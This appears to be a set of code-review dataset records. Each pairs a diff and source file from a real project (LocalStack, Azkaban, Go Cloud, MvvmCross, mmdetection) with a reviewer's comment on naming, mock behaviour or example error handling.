"PERSISTENCE_SINGLE_FILE", "S3_SKIP_SIGNATURE_VALIDATION", "DEVELOP", 
"DEVELOP_PORT", "WAIT_FOR_DEBUGGER", "KINESIS_INITIALIZE_STREAMS", "TF_COMPAT_MODE", "LAMBDA_DOCKER_FLAGS", "LAMBDA_FORWARD_URL", "LAMBDA_CODE_EXTRACT_TIME", "THUNDRA_APIKEY", "THUNDRA_AGENT_JAVA_VERSION", "THUNDRA_AGENT_NODE_VERSION", "THUNDRA_AGENT_PYTHON_VERSION", "DISABLE_CORS_CHECKS", "DISABLE_CUSTOM_CORS_S3", "DISABLE_CUSTOM_CORS_APIGATEWAY", "EXTRA_CORS_ALLOWED_HEADERS", "EXTRA_CORS_EXPOSE_HEADERS", "EXTRA_CORS_ALLOWED_ORIGINS", "ENABLE_CONFIG_UPDATES", "LOCALSTACK_HTTP_PROXY", "LOCALSTACK_HTTPS_PROXY", "REQUESTS_CA_BUNDLE", "LEGACY_DOCKER_CLIENT", "EAGER_SERVICE_LOADING", "LAMBDA_STAY_OPEN_MODE", ] for key, value in six.iteritems(DEFAULT_SERVICE_PORTS): clean_key = key.upper().replace("-", "_") CONFIG_ENV_VARS += [ clean_key + "_BACKEND", clean_key + "_PORT", clean_key + "_PORT_EXTERNAL", ] def collect_config_items() -> List[Tuple[str, Any]]: """Returns a list of key-value tuples of LocalStack configuration values.""" none = object() # sentinel object # collect which keys to print keys = list() keys.extend(CONFIG_ENV_VARS) keys.append("DATA_DIR") keys.sort() values = globals() result = list() for k in keys: v = values.get(k, none) if v is none: continue result.append((k, v)) result.sort() return result def ping(host): """Returns True if host responds to a ping request""" is_windows = platform.system().lower() == "windows" ping_opts = "-n 1" if is_windows else "-c 1" args = "ping %s %s" % (ping_opts, host) return ( subprocess.call(args, shell=not is_windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0 ) def in_docker(): """ Returns True if running in a docker container, else False Ref. 
https://docs.docker.com/config/containers/runmetrics/#control-groups """ if OVERRIDE_IN_DOCKER: return True if os.path.exists("/.dockerenv"): return True if not os.path.exists("/proc/1/cgroup"): return False try: if any( [ os.path.exists("/sys/fs/cgroup/memory/docker/"), any( [ "docker-" in file_names for file_names in os.listdir("/sys/fs/cgroup/memory/system.slice") ] ), os.path.exists("/sys/fs/cgroup/docker/"), any( [ "docker-" in file_names for file_names in os.listdir("/sys/fs/cgroup/system.slice/") ] ), ] ): return False except Exception: pass with open("/proc/1/cgroup", "rt") as ifh: content = ifh.read() if "docker" in content: return True os_hostname = socket.gethostname() if os_hostname and os_hostname in content: return True return False is_in_docker = in_docker() is_in_linux = is_linux() # determine IP of Docker bridge if not DOCKER_BRIDGE_IP: DOCKER_BRIDGE_IP = "172.17.0.1" if is_in_docker: candidates = (DOCKER_BRIDGE_IP, "172.18.0.1") for ip in candidates: if ping(ip): DOCKER_BRIDGE_IP = ip break # determine route to Docker host from container try: DOCKER_HOST_FROM_CONTAINER = DOCKER_BRIDGE_IP if not is_in_docker and not is_in_linux: # If we're running outside docker, and would like the Lambda containers to be able # to access services running on the local machine, set DOCKER_HOST_FROM_CONTAINER accordingly if LOCALSTACK_HOSTNAME == LOCALHOST: DOCKER_HOST_FROM_CONTAINER = "host.docker.internal" # update LOCALSTACK_HOSTNAME if host.docker.internal is available if is_in_docker: DOCKER_HOST_FROM_CONTAINER = socket.gethostbyname("host.docker.internal") if LOCALSTACK_HOSTNAME == DOCKER_BRIDGE_IP: LOCALSTACK_HOSTNAME = DOCKER_HOST_FROM_CONTAINER except socket.error: pass # make sure we default to LAMBDA_REMOTE_DOCKER=true if running in Docker if is_in_docker and not os.environ.get("LAMBDA_REMOTE_DOCKER", "").strip(): LAMBDA_REMOTE_DOCKER = True # whether lambdas should use stay open mode if executed in "docker-reuse" executor LAMBDA_STAY_OPEN_MODE = 
is_in_docker and is_env_not_false("LAMBDA_STAY_OPEN_MODE") # set variables no_proxy, i.e., run internal service calls directly no_proxy = ",".join(set((LOCALSTACK_HOSTNAME, LOCALHOST, LOCALHOST_IP, "[::1]"))) if os.environ.get("no_proxy"): os.environ["no_proxy"] += "," + no_proxy elif os.environ.get("NO_PROXY"): os.environ["NO_PROXY"] += "," + no_proxy else: os.environ["no_proxy"] = no_proxy # additional CLI commands, can be set by plugins CLI_COMMANDS = {} # set of valid regions VALID_PARTITIONS = set(Session().get_available_partitions()) VALID_REGIONS = set() for partition in VALID_PARTITIONS: for region in Session().get_available_regions("sns", partition): VALID_REGIONS.add(region) def parse_service_ports() -> Dict[str, int]: """Parses the environment variable $SERVICES with a comma-separated list of services and (optional) ports they should run on: 'service1:port1,service2,service3:port3'""" service_ports = os.environ.get("SERVICES", "").strip() if not service_ports: return DEFAULT_SERVICE_PORTS result = {} for service_port in re.split(r"\s*,\s*", service_ports): parts = re.split(r"[:=]", service_port) service = parts[0] key_upper = service.upper().replace("-", "_") port_env_name = "%s_PORT" % key_upper # (1) set default port number port_number = DEFAULT_SERVICE_PORTS.get(service) # (2) set port number from <SERVICE>_PORT environment, if present if os.environ.get(port_env_name): port_number = os.environ.get(port_env_name) # (3) set port number from <service>:<port> portion in $SERVICES, if present if len(parts) > 1: port_number = int(parts[-1]) # (4) try to parse as int, fall back to 0 (invalid port) try: port_number = int(port_number) except Exception: port_number = 0 result[service] = port_number return result # TODO: we need to investigate the performance impact of this def populate_configs(service_ports=None): global SERVICE_PORTS, CONFIG_ENV_VARS SERVICE_PORTS = service_ports or parse_service_ports() globs = globals() protocol = get_protocol() # define 
service ports and URLs as environment variables for key, value in six.iteritems(DEFAULT_SERVICE_PORTS): key_upper = key.upper().replace("-", "_") # define PORT_* variables with actual service ports as per configuration port_var_name = "PORT_%s" % key_upper port_number = service_port(key) globs[port_var_name] = port_number url = "%s://%s:%s" % (protocol, LOCALSTACK_HOSTNAME, port_number) # define TEST_*_URL variables with mock service endpoints url_key = "TEST_%s_URL" % key_upper # allow overwriting TEST_*_URL from user-defined environment variables existing = os.environ.get(url_key) url = existing or url # set global variable globs[url_key] = url # expose HOST_*_URL variables as environment variables os.environ[url_key] = url # expose LOCALSTACK_HOSTNAME as env. variable os.environ["LOCALSTACK_HOSTNAME"] = LOCALSTACK_HOSTNAME # create variable aliases prefixed with LOCALSTACK_ (except LOCALSTACK_HOSTNAME) CONFIG_ENV_VARS += [ "LOCALSTACK_" + v for v in CONFIG_ENV_VARS if not v.startswith("LOCALSTACK_") ] CONFIG_ENV_VARS = list(set(CONFIG_ENV_VARS)) def service_port(service_key): if FORWARD_EDGE_INMEM: if service_key == "elasticsearch": # TODO Elasticsearch domains are a special case - we do not want to route them through # the edge service, as that would require too many route mappings. 
In the future, we # should integrate them with the port range for external services (4510-4530) return SERVICE_PORTS.get(service_key, 0) return get_edge_port_http() return SERVICE_PORTS.get(service_key, 0) def get_protocol(): return "https" if USE_SSL else "http" def external_service_url(service_key, host=None): host = host or HOSTNAME_EXTERNAL return "%s://%s:%s" % (get_protocol(), host, service_port(service_key)) def get_edge_port_http(): return EDGE_PORT_HTTP or EDGE_PORT def get_edge_url(localstack_hostname=None, protocol=None): port = get_edge_port_http() protocol = protocol or get_protocol() localstack_hostname = localstack_hostname or LOCALSTACK_HOSTNAME return "%s://%s:%s" % (protocol, localstack_hostname, port) # initialize config values populate_configs() # set log levels if DEBUG: logging.getLogger("").setLevel(logging.DEBUG) logging.getLogger("localstack").setLevel(logging.DEBUG) if LS_LOG in TRACE_LOG_LEVELS: load_end_time = time.time() LOG = logging.getLogger(__name__) LOG.debug( "Initializing the configuration took %s ms" % int((load_end_time - load_start_time) * 1000) ) class ServiceProviderConfig(Mapping[str, str]): _provider_config: Dict[str, str] default_value: str def __init__(self, default_value: str): self._provider_config = dict() self.default_value = default_value def get_provider(self, service: str) -> str: return self._provider_config.get(service, self.default_value) def set_provider_if_not_exists(self, service: str, provider: str) -> None: if service not in self._provider_config: self._provider_config[service] = provider def set_provider(self, service: str, provider: str): self._provider_config[service] = provider def bulk_set_provider_if_not_exists(self, services: List[str], provider: str): for service in services: self.set_provider_if_not_exists(service, provider) def __getitem__(self, item): return self.get_provider(item) def __setitem__(self, key, value): self.set_provider(key, value) def __len__(self): return 
len(self._provider_config) def __iter__(self): return self._provider_config.__iter__() SERVICE_PROVIDER_CONFIG = ServiceProviderConfig("default") for key, value in os.environ.items(): if key.startswith("PROVIDER_OVERRIDE_"): SERVICE_PROVIDER_CONFIG.set_provider(key.lstrip("PROVIDER_OVERRIDE_").lower(), value) # initialize directories if is_in_docker: dirs = Directories.for_container() else: dirs = Directories.from_config() dirs.mkdirs() # TODO: remove deprecation warning with next release for path in [dirs.config, os.path.join(dirs.tmp, ".localstack")]: if path and os.path.isfile(path): print( f"warning: the config file .localstack is deprecated and no longer used, " f"please remove it by running rm {path}" )
1
13,969
i'm not sure about htis naming here. both the word partition and adjustment are very ambiguous and it's not clear what it does. i would maybe go for something less generic and more concrete like `GOV_CLOUD_SUPPORT`
localstack-localstack
py
@@ -78,7 +78,13 @@ public class MockExecutorLoader implements ExecutorLoader { @Override public Map<Integer, Pair<ExecutionReference, ExecutableFlow>> fetchUnfinishedFlows() throws ExecutorManagerException { - return new ConcurrentHashMap<>(); + return this.activeFlows; + } + + @Override + public Map<Integer, Pair<ExecutionReference, ExecutableFlow>> fetchUnfinishedExecutions() + throws ExecutorManagerException { + return this.activeFlows; } @Override
1
/* * Copyright 2014 LinkedIn Corp. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ package azkaban.executor; import azkaban.executor.ExecutorLogEvent.EventType; import azkaban.utils.FileIOUtils.LogData; import azkaban.utils.Pair; import azkaban.utils.Props; import java.io.File; import java.io.IOException; import java.time.Duration; import java.util.ArrayList; import java.util.Date; import java.util.List; import java.util.Map; import java.util.concurrent.ConcurrentHashMap; import org.apache.commons.io.FileUtils; import org.apache.log4j.Logger; /** * Used in unit tests to mock the "DB layer" (the real implementation is JdbcExecutorLoader). * Captures status updates of jobs and flows (in memory) so that they can be checked in tests. 
*/ public class MockExecutorLoader implements ExecutorLoader { private static final Logger logger = Logger.getLogger(MockExecutorLoader.class); Map<Integer, Integer> executionExecutorMapping = new ConcurrentHashMap<>(); Map<Integer, ExecutableFlow> flows = new ConcurrentHashMap<>(); Map<String, ExecutableNode> nodes = new ConcurrentHashMap<>(); Map<Integer, ExecutionReference> refs = new ConcurrentHashMap<>(); int flowUpdateCount = 0; Map<String, Integer> jobUpdateCount = new ConcurrentHashMap<>(); Map<Integer, Pair<ExecutionReference, ExecutableFlow>> activeFlows = new ConcurrentHashMap<>(); List<Executor> executors = new ArrayList<>(); int executorIdCounter = 0; Map<Integer, ArrayList<ExecutorLogEvent>> executorEvents = new ConcurrentHashMap<>(); @Override public void uploadExecutableFlow(final ExecutableFlow flow) throws ExecutorManagerException { // Clone the flow node to mimick how it would be saved in DB. // If we would keep a handle to the original flow node, we would also see any changes made after // this method was called. We must only store a snapshot of the current state. 
// Also to avoid modifying statuses of the original job nodes in this.updateExecutableFlow() final ExecutableFlow exFlow = ExecutableFlow.createExecutableFlowFromObject(flow.toObject()); this.flows.put(flow.getExecutionId(), exFlow); this.flowUpdateCount++; } @Override public ExecutableFlow fetchExecutableFlow(final int execId) throws ExecutorManagerException { final ExecutableFlow flow = this.flows.get(execId); return ExecutableFlow.createExecutableFlowFromObject(flow.toObject()); } @Override public Map<Integer, Pair<ExecutionReference, ExecutableFlow>> fetchActiveFlows() throws ExecutorManagerException { return this.activeFlows; } @Override public Map<Integer, Pair<ExecutionReference, ExecutableFlow>> fetchUnfinishedFlows() throws ExecutorManagerException { return new ConcurrentHashMap<>(); } @Override public Pair<ExecutionReference, ExecutableFlow> fetchActiveFlowByExecId(final int execId) { return new Pair<>(null, null); } @Override public List<ExecutableFlow> fetchFlowHistory(final int projectId, final String flowId, final int skip, final int num) throws ExecutorManagerException { return null; } @Override public void addActiveExecutableReference(final ExecutionReference ref) throws ExecutorManagerException { this.refs.put(ref.getExecId(), ref); } @Override public void removeActiveExecutableReference(final int execId) throws ExecutorManagerException { this.refs.remove(execId); } @Override public void uploadLogFile(final int execId, final String name, final int attempt, final File... 
files) throws ExecutorManagerException { for (final File file : files) { try { final String logs = FileUtils.readFileToString(file, "UTF-8"); logger.info("Uploaded log for [" + name + "]:[" + execId + "]:\n" + logs); } catch (final IOException e) { throw new RuntimeException(e); } } } @Override public void updateExecutableFlow(final ExecutableFlow flow) throws ExecutorManagerException { final ExecutableFlow toUpdate = this.flows.get(flow.getExecutionId()); toUpdate.applyUpdateObject(flow.toUpdateObject(0)); this.flowUpdateCount++; } @Override public void uploadExecutableNode(final ExecutableNode node, final Props inputParams) throws ExecutorManagerException { // Clone the job node to mimick how it would be saved in DB. // If we would keep a handle to the original job node, we would also see any changes made after // this method was called. We must only store a snapshot of the current state. // Also to avoid modifying statuses of the original job nodes in this.updateExecutableNode() final ExecutableNode exNode = new ExecutableNode(); exNode.fillExecutableFromMapObject(node.toObject()); this.nodes.put(node.getId(), exNode); this.jobUpdateCount.put(node.getId(), 1); } @Override public void updateExecutableNode(final ExecutableNode node) throws ExecutorManagerException { final ExecutableNode foundNode = this.nodes.get(node.getId()); foundNode.setEndTime(node.getEndTime()); foundNode.setStartTime(node.getStartTime()); foundNode.setStatus(node.getStatus()); foundNode.setUpdateTime(node.getUpdateTime()); Integer value = this.jobUpdateCount.get(node.getId()); if (value == null) { throw new ExecutorManagerException("The node has not been uploaded"); } else { this.jobUpdateCount.put(node.getId(), ++value); } this.flowUpdateCount++; } @Override public int fetchNumExecutableFlows(final int projectId, final String flowId) throws ExecutorManagerException { return 0; } @Override public int fetchNumExecutableFlows() throws ExecutorManagerException { // TODO Auto-generated method 
stub return 0; } public Integer getNodeUpdateCount(final String jobId) { return this.jobUpdateCount.get(jobId); } @Override public ExecutableJobInfo fetchJobInfo(final int execId, final String jobId, final int attempt) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public boolean updateExecutableReference(final int execId, final long updateTime) throws ExecutorManagerException { // TODO Auto-generated method stub return true; } @Override public LogData fetchLogs(final int execId, final String name, final int attempt, final int startByte, final int endByte) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public List<ExecutableFlow> fetchFlowHistory(final int skip, final int num) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public List<ExecutableFlow> fetchFlowHistory(final String projectContains, final String flowContains, final String userNameContains, final int status, final long startData, final long endData, final int skip, final int num) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public List<ExecutableFlow> fetchFlowHistory(final int projectId, final String flowId, final long startTime) throws ExecutorManagerException { return new ArrayList<>(); } @Override public List<ExecutableJobInfo> fetchJobHistory(final int projectId, final String jobId, final int skip, final int size) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public int fetchNumExecutableNodes(final int projectId, final String jobId) throws ExecutorManagerException { // TODO Auto-generated method stub return 0; } @Override public Props fetchExecutionJobInputProps(final int execId, final String jobId) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public Props fetchExecutionJobOutputProps(final int execId, final String 
jobId) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public Pair<Props, Props> fetchExecutionJobProps(final int execId, final String jobId) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public List<ExecutableJobInfo> fetchJobInfoAttempts(final int execId, final String jobId) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public int removeExecutionLogsByTime(final long millis) throws ExecutorManagerException { // TODO Auto-generated method stub return 0; } @Override public List<ExecutableFlow> fetchFlowHistory(final int projectId, final String flowId, final int skip, final int num, final Status status) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public List<Object> fetchAttachments(final int execId, final String name, final int attempt) throws ExecutorManagerException { // TODO Auto-generated method stub return null; } @Override public void uploadAttachmentFile(final ExecutableNode node, final File file) throws ExecutorManagerException { // TODO Auto-generated method stub } @Override public List<Executor> fetchActiveExecutors() throws ExecutorManagerException { final List<Executor> activeExecutors = new ArrayList<>(); for (final Executor executor : this.executors) { if (executor.isActive()) { activeExecutors.add(executor); } } return activeExecutors; } @Override public Executor fetchExecutor(final String host, final int port) throws ExecutorManagerException { for (final Executor executor : this.executors) { if (executor.getHost().equals(host) && executor.getPort() == port) { return executor; } } return null; } @Override public Executor fetchExecutor(final int executorId) throws ExecutorManagerException { for (final Executor executor : this.executors) { if (executor.getId() == executorId) { return executor; } } return null; } @Override public Executor addExecutor(final String 
host, final int port) throws ExecutorManagerException { Executor executor = null; if (fetchExecutor(host, port) == null) { this.executorIdCounter++; executor = new Executor(this.executorIdCounter, host, port, true); this.executors.add(executor); } return executor; } @Override public void removeExecutor(final String host, final int port) throws ExecutorManagerException { final Executor executor = fetchExecutor(host, port); if (executor != null) { this.executorIdCounter--; this.executors.remove(executor); } } @Override public void postExecutorEvent(final Executor executor, final EventType type, final String user, final String message) throws ExecutorManagerException { final ExecutorLogEvent event = new ExecutorLogEvent(executor.getId(), user, new Date(), type, message); if (!this.executorEvents.containsKey(executor.getId())) { this.executorEvents.put(executor.getId(), new ArrayList<>()); } this.executorEvents.get(executor.getId()).add(event); } @Override public List<ExecutorLogEvent> getExecutorEvents(final Executor executor, final int num, final int skip) throws ExecutorManagerException { if (!this.executorEvents.containsKey(executor.getId())) { final List<ExecutorLogEvent> events = this.executorEvents.get(executor.getId()); return events.subList(skip, Math.min(num + skip - 1, events.size() - 1)); } return null; } @Override public void updateExecutor(final Executor executor) throws ExecutorManagerException { final Executor oldExecutor = fetchExecutor(executor.getId()); this.executors.remove(oldExecutor); this.executors.add(executor); } @Override public List<Executor> fetchAllExecutors() throws ExecutorManagerException { return this.executors; } @Override public void assignExecutor(final int executorId, final int execId) throws ExecutorManagerException { final ExecutionReference ref = this.refs.get(execId); ref.setExecutor(fetchExecutor(executorId)); this.executionExecutorMapping.put(execId, executorId); } @Override public Executor fetchExecutorByExecutionId(final 
int execId) throws ExecutorManagerException { if (this.executionExecutorMapping.containsKey(execId)) { return fetchExecutor(this.executionExecutorMapping.get(execId)); } else { throw new ExecutorManagerException( "Failed to find executor with execution : " + execId); } } @Override public List<Pair<ExecutionReference, ExecutableFlow>> fetchQueuedFlows() throws ExecutorManagerException { final List<Pair<ExecutionReference, ExecutableFlow>> queuedFlows = new ArrayList<>(); for (final int execId : this.refs.keySet()) { if (!this.executionExecutorMapping.containsKey(execId)) { queuedFlows.add(new Pair<>(this.refs .get(execId), this.flows.get(execId))); } } return queuedFlows; } @Override public void unassignExecutor(final int executionId) throws ExecutorManagerException { this.executionExecutorMapping.remove(executionId); } @Override public List<ExecutableFlow> fetchRecentlyFinishedFlows(final Duration maxAge) throws ExecutorManagerException { return new ArrayList<>(); } @Override public int selectAndUpdateExecution(final int executorId) throws ExecutorManagerException { return 1; } }
1
17,114
unfinishedFlows might not be the same as activeFlows. Will it cause confusion here?
azkaban-azkaban
java
@@ -73,3 +73,18 @@ func Example() { cfg := snapshot.Value.(MyConfig) _ = cfg } + +func Example_openVariable() { + // OpenVariable creates a *runtimevar.Variable from a URL. + ctx := context.Background() + v, err := runtimevar.OpenVariable(ctx, "runtimeconfigurator://myproject/myconfigid/myvar?decoder=string") + if err != nil { + log.Fatal(err) + } + + snapshot, err := v.Watch(ctx) + if err != nil { + log.Fatal(err) + } + _, _ = snapshot, err +}
1
// Copyright 2018 The Go Cloud Development Kit Authors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // https://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package runtimeconfigurator_test import ( "context" "log" "gocloud.dev/gcp" "gocloud.dev/runtimevar" "gocloud.dev/runtimevar/runtimeconfigurator" ) // MyConfig is a sample configuration struct. type MyConfig struct { Server string Port int } func Example() { // Your GCP credentials. // See https://cloud.google.com/docs/authentication/production // for more info on alternatives. ctx := context.Background() creds, err := gcp.DefaultCredentials(ctx) if err != nil { log.Fatal(err) } // Connect to the Runtime Configurator service. client, cleanup, err := runtimeconfigurator.Dial(ctx, creds.TokenSource) if err != nil { log.Fatal(err) } defer cleanup() // Create a decoder for decoding JSON strings into MyConfig. decoder := runtimevar.NewDecoder(MyConfig{}, runtimevar.JSONDecode) // Fill these in with the values from the Cloud Console. // For this example, the GCP Cloud Runtime Configurator variable being // referenced should have a JSON string that decodes into MyConfig. name := runtimeconfigurator.ResourceName{ ProjectID: "gcp-project-id", Config: "cfg-name", Variable: "cfg-variable-name", } // Construct a *runtimevar.Variable that watches the variable. v, err := runtimeconfigurator.NewVariable(client, name, decoder, nil) if err != nil { log.Fatal(err) } defer v.Close() // We can now read the current value of the variable from v. 
snapshot, err := v.Watch(context.Background()) if err != nil { log.Fatal(err) } cfg := snapshot.Value.(MyConfig) _ = cfg }
1
15,234
Same, remove the error handling.
google-go-cloud
go
@@ -1,14 +1,16 @@ -// IMvxAppStart.cs +// IMvxAppStart.cs // MvvmCross is licensed using Microsoft Public License (Ms-PL) // Contributions and inspirations noted in readme.md and license.txt // // Project Lead - Stuart Lodge, @slodge, [email protected] +using System.Threading.Tasks; + namespace MvvmCross.Core.ViewModels { public interface IMvxAppStart { - void Start(object hint = null); + Task Start(object hint = null); } }
1
// IMvxAppStart.cs // MvvmCross is licensed using Microsoft Public License (Ms-PL) // Contributions and inspirations noted in readme.md and license.txt // // Project Lead - Stuart Lodge, @slodge, [email protected] namespace MvvmCross.Core.ViewModels { public interface IMvxAppStart { void Start(object hint = null); } }
1
13,533
We should not change this at this time.
MvvmCross-MvvmCross
.cs
@@ -242,8 +242,8 @@ class AnchorGenerator(object): Args: base_anchors (torch.Tensor): The base anchors of a feature grid. featmap_size (tuple[int]): Size of the feature maps. - stride (tuple[int], optional): Stride of the feature map. - Defaults to (16, 16). + stride (tuple[int], optional): Stride of the feature map in order + (w, h). Defaults to (16, 16). device (str, optional): Device the tensor will be put on. Defaults to 'cuda'.
1
import mmcv import numpy as np import torch from torch.nn.modules.utils import _pair from .builder import ANCHOR_GENERATORS @ANCHOR_GENERATORS.register_module() class AnchorGenerator(object): """Standard anchor generator for 2D anchor-based detectors. Args: strides (list[int] | list[tuple[int, int]]): Strides of anchors in multiple feature levels. ratios (list[float]): The list of ratios between the height and width of anchors in a single level. scales (list[int] | None): Anchor scales for anchors in a single level. It cannot be set at the same time if `octave_base_scale` and `scales_per_octave` are set. base_sizes (list[int] | None): The basic sizes of anchors in multiple levels. If None is given, strides will be used as base_sizes. (If strides are non square, the shortest stride is taken.) scale_major (bool): Whether to multiply scales first when generating base anchors. If true, the anchors in the same row will have the same scales. By default it is True in V2.0 octave_base_scale (int): The base scale of octave. scales_per_octave (int): Number of scales for each octave. `octave_base_scale` and `scales_per_octave` are usually used in retinanet and the `scales` should be None when they are set. centers (list[tuple[float, float]] | None): The centers of the anchor relative to the feature grid center in multiple feature levels. By default it is set to be None and not used. If a list of tuple of float is given, they will be used to shift the centers of anchors. center_offset (float): The offset of center in proportion to anchors' width and height. By default it is 0 in V2.0. 
Examples: >>> from mmdet.core import AnchorGenerator >>> self = AnchorGenerator([16], [1.], [1.], [9]) >>> all_anchors = self.grid_anchors([(2, 2)], device='cpu') >>> print(all_anchors) [tensor([[-4.5000, -4.5000, 4.5000, 4.5000], [11.5000, -4.5000, 20.5000, 4.5000], [-4.5000, 11.5000, 4.5000, 20.5000], [11.5000, 11.5000, 20.5000, 20.5000]])] >>> self = AnchorGenerator([16, 32], [1.], [1.], [9, 18]) >>> all_anchors = self.grid_anchors([(2, 2), (1, 1)], device='cpu') >>> print(all_anchors) [tensor([[-4.5000, -4.5000, 4.5000, 4.5000], [11.5000, -4.5000, 20.5000, 4.5000], [-4.5000, 11.5000, 4.5000, 20.5000], [11.5000, 11.5000, 20.5000, 20.5000]]), \ tensor([[-9., -9., 9., 9.]])] """ def __init__(self, strides, ratios, scales=None, base_sizes=None, scale_major=True, octave_base_scale=None, scales_per_octave=None, centers=None, center_offset=0.): # check center and center_offset if center_offset != 0: assert centers is None, 'center cannot be set when center_offset' \ f'!=0, {centers} is given.' 
if not (0 <= center_offset <= 1): raise ValueError('center_offset should be in range [0, 1], ' f'{center_offset} is given.') if centers is not None: assert len(centers) == len(strides), \ 'The number of strides should be the same as centers, got ' \ f'{strides} and {centers}' # calculate base sizes of anchors self.strides = [_pair(stride) for stride in strides] self.base_sizes = [min(stride) for stride in self.strides ] if base_sizes is None else base_sizes assert len(self.base_sizes) == len(self.strides), \ 'The number of strides should be the same as base sizes, got ' \ f'{self.strides} and {self.base_sizes}' # calculate scales of anchors assert ((octave_base_scale is not None and scales_per_octave is not None) ^ (scales is not None)), \ 'scales and octave_base_scale with scales_per_octave cannot' \ ' be set at the same time' if scales is not None: self.scales = torch.Tensor(scales) elif octave_base_scale is not None and scales_per_octave is not None: octave_scales = np.array( [2**(i / scales_per_octave) for i in range(scales_per_octave)]) scales = octave_scales * octave_base_scale self.scales = torch.Tensor(scales) else: raise ValueError('Either scales or octave_base_scale with ' 'scales_per_octave should be set') self.octave_base_scale = octave_base_scale self.scales_per_octave = scales_per_octave self.ratios = torch.Tensor(ratios) self.scale_major = scale_major self.centers = centers self.center_offset = center_offset self.base_anchors = self.gen_base_anchors() @property def num_base_anchors(self): """list[int]: total number of base anchors in a feature grid""" return [base_anchors.size(0) for base_anchors in self.base_anchors] @property def num_levels(self): """int: number of feature levels that the generator will be applied""" return len(self.strides) def gen_base_anchors(self): """Generate base anchors. Returns: list(torch.Tensor): Base anchors of a feature grid in multiple \ feature levels. 
""" multi_level_base_anchors = [] for i, base_size in enumerate(self.base_sizes): center = None if self.centers is not None: center = self.centers[i] multi_level_base_anchors.append( self.gen_single_level_base_anchors( base_size, scales=self.scales, ratios=self.ratios, center=center)) return multi_level_base_anchors def gen_single_level_base_anchors(self, base_size, scales, ratios, center=None): """Generate base anchors of a single level. Args: base_size (int | float): Basic size of an anchor. scales (torch.Tensor): Scales of the anchor. ratios (torch.Tensor): The ratio between between the height and width of anchors in a single level. center (tuple[float], optional): The center of the base anchor related to a single feature grid. Defaults to None. Returns: torch.Tensor: Anchors in a single-level feature maps. """ w = base_size h = base_size if center is None: x_center = self.center_offset * w y_center = self.center_offset * h else: x_center, y_center = center h_ratios = torch.sqrt(ratios) w_ratios = 1 / h_ratios if self.scale_major: ws = (w * w_ratios[:, None] * scales[None, :]).view(-1) hs = (h * h_ratios[:, None] * scales[None, :]).view(-1) else: ws = (w * scales[:, None] * w_ratios[None, :]).view(-1) hs = (h * scales[:, None] * h_ratios[None, :]).view(-1) # use float anchor and the anchor's center is aligned with the # pixel center base_anchors = [ x_center - 0.5 * ws, y_center - 0.5 * hs, x_center + 0.5 * ws, y_center + 0.5 * hs ] base_anchors = torch.stack(base_anchors, dim=-1) return base_anchors def _meshgrid(self, x, y, row_major=True): """Generate mesh grid of x and y. Args: x (torch.Tensor): Grids of x dimension. y (torch.Tensor): Grids of y dimension. row_major (bool, optional): Whether to return y grids first. Defaults to True. Returns: tuple[torch.Tensor]: The mesh grids of x and y. 
""" xx = x.repeat(len(y)) yy = y.view(-1, 1).repeat(1, len(x)).view(-1) if row_major: return xx, yy else: return yy, xx def grid_anchors(self, featmap_sizes, device='cuda'): """Generate grid anchors in multiple feature levels. Args: featmap_sizes (list[tuple]): List of feature map sizes in multiple feature levels. device (str): Device where the anchors will be put on. Return: list[torch.Tensor]: Anchors in multiple feature levels. \ The sizes of each tensor should be [N, 4], where \ N = width * height * num_base_anchors, width and height \ are the sizes of the corresponding feature level, \ num_base_anchors is the number of anchors for that level. """ assert self.num_levels == len(featmap_sizes) multi_level_anchors = [] for i in range(self.num_levels): anchors = self.single_level_grid_anchors( self.base_anchors[i].to(device), featmap_sizes[i], self.strides[i], device=device) multi_level_anchors.append(anchors) return multi_level_anchors def single_level_grid_anchors(self, base_anchors, featmap_size, stride=(16, 16), device='cuda'): """Generate grid anchors of a single level. Note: This function is usually called by method ``self.grid_anchors``. Args: base_anchors (torch.Tensor): The base anchors of a feature grid. featmap_size (tuple[int]): Size of the feature maps. stride (tuple[int], optional): Stride of the feature map. Defaults to (16, 16). device (str, optional): Device the tensor will be put on. Defaults to 'cuda'. Returns: torch.Tensor: Anchors in the overall feature maps. 
""" feat_h, feat_w = featmap_size # convert Tensor to int, so that we can covert to ONNX correctlly feat_h = int(feat_h) feat_w = int(feat_w) shift_x = torch.arange(0, feat_w, device=device) * stride[0] shift_y = torch.arange(0, feat_h, device=device) * stride[1] shift_xx, shift_yy = self._meshgrid(shift_x, shift_y) shifts = torch.stack([shift_xx, shift_yy, shift_xx, shift_yy], dim=-1) shifts = shifts.type_as(base_anchors) # first feat_w elements correspond to the first row of shifts # add A anchors (1, A, 4) to K shifts (K, 1, 4) to get # shifted anchors (K, A, 4), reshape to (K*A, 4) all_anchors = base_anchors[None, :, :] + shifts[:, None, :] all_anchors = all_anchors.view(-1, 4) # first A rows correspond to A anchors of (0, 0) in feature map, # then (0, 1), (0, 2), ... return all_anchors def valid_flags(self, featmap_sizes, pad_shape, device='cuda'): """Generate valid flags of anchors in multiple feature levels. Args: featmap_sizes (list(tuple)): List of feature map sizes in multiple feature levels. pad_shape (tuple): The padded shape of the image. device (str): Device where the anchors will be put on. Return: list(torch.Tensor): Valid 